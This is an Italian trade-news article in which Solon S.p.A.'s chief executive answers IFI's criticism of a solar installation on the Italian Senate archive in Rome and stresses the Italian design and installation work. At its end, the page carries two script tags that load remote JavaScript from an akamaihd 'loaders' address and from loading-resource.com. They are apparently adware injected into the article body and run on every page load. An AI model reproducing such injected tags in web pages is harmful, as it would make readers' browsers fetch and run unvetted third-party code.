1. Home
  2. Notizie e Mercato
  3. Solon replica alle critiche di IFI

Solon replica alle critiche di IFI

Energie rinnovabili di
5/5
votato da 1 persone
Appresa la polemica da parte di IFI per l’impianto fotovoltaico installato sull’archivio del Senato a Roma, l’Amministratore Delegato Solon S.p.a. risponde

E’ con sincero stupore e rammarico che abbiamo appreso la critica da parte dell’IFI per l’impianto realizzato sugli edifici dell’archivio del Senato della Repubblica a Roma”, dichiara Emiliano Pizzini, Presidente ed Amministratore Delegato SOLON S.p.A., facendo seguito agli articoli pubblicati in questi giorni nelle testate di settore e non solo.

SOLON S.p.A. fa parte della tradizione storica del fotovoltaico nazionale: nata a Carmignano di Brenta, in provincia di Padova, nel 1994 , divenuta filiale di una multinazionale tedesca ancora nel 2007, ha sempre mantenuto la propria identità italiana, conservando un’esperienza e un know-how decennale nella progettazione, sviluppo e installazione di impianti fotovoltaici”.



I moduli SOLON utilizzati per l’impianto al centro della polemica” - continua Pizzini - “sono infatti realizzati presso la nostra sede produttiva tedesca e rappresentano un esempio di qualità ed efficienza riconosciuto in tutto il mondo. La progettazione è stata eseguita da ingegneri e tecnici italiani SOLON della sede di Carmignano di Brenta, e anche l’installazione stessa è ad opera di un’azienda italiana Partner certificato di SOLON”.

In definitiva quindi è importante ribadire che il prodotto utilizzato è SOLON, prodotto in Germania, ma distribuito dalla filiale italiana SOLON Spa, che opera autonomamente nel mercato italiano, e tutta la progettazione ed installazione è “Made in Italy”.

In un momento storicamente così difficile e di cambiamento per il fotovoltaico, gli operatori dovrebbero accantonare rivalità e infondate polemiche, cercando invece di collaborare e fare rete per garantire un futuro sia in ambito italiano che internazionale a questo importante settore.

<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script><script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>